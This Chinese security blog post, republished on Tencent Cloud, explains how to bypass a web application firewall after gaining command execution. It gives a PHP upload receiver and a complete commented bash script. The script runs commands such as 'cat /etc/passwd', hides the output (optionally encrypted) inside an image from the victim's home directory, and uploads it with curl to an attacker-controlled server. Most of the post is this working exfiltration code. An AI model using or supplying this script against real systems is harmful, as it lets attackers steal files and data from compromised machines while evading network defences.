前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >命令执行之绕过防火墙继续执行命令

命令执行之绕过防火墙继续执行命令

作者头像
鸿鹄实验室
发布2021-04-15 10:46:34
1.3K0
发布2021-04-15 10:46:34
举报
文章被收录于专栏:鸿鹄实验室

各位师傅已放假,公众号更新速度自然也要跟得上。今天就是一个命令执行的小技巧。

我们在实战中经常会遇到命令执行漏洞,而由于现在各类waf横行,就会导致我们在执行一些命令时直接被waf拦截,比如执行cat /etc/passwd的时候,直接被拦截了关键字,导致我们无法成功执行。类似于下图这种。

然后直接被waf拦截住。这个时候如果目标出网的话,我们就可以使用下面的方法,进行突破。原理大体如下:

即让目标主动访问我们的一个php的服务,并且将执行结果写入图片,然后打开图片得到我们的命令执行结果

下面是具体操作:

首先我们需要准备一个php文件,内容如下:

代码语言:javascript
复制
<?php
    $file = date("dHis") . ".png";
    move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>

然后我们还需要一个脚本文件,来完成请求与命令执行操作:

代码语言:javascript
复制
#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attackers PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'

# An `if` statement to determine the value of the exfilType
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluable the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attackers PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"

然后我们修改exfilData为我们需要执行的命令,exfilSite为你的php站点的地址,tmpImage是图片的一个地址,我这里直接使用百度的图片,useEncrypt决定是否进行硬编码,1为使用上面的密码进行编码,0为不编码。

修改后如下:

代码语言:javascript
复制
#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='cat /etc/passwd'

# Where the attackers PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://192.168.0.107/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='0'

# An `if` statement to determine the value of the exfilType
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluable the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attackers PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"

然后开启一个web服务:

然后模拟攻击者执行脚本文件,服务器得到请求

服务器生成图片,打开图片得到命令执行的内容:

参考文章:

https://null-byte.wonderhowto.com/how-to/hacking-macos-use-images-smuggle-data-through-firewalls-0197128/

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-07-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档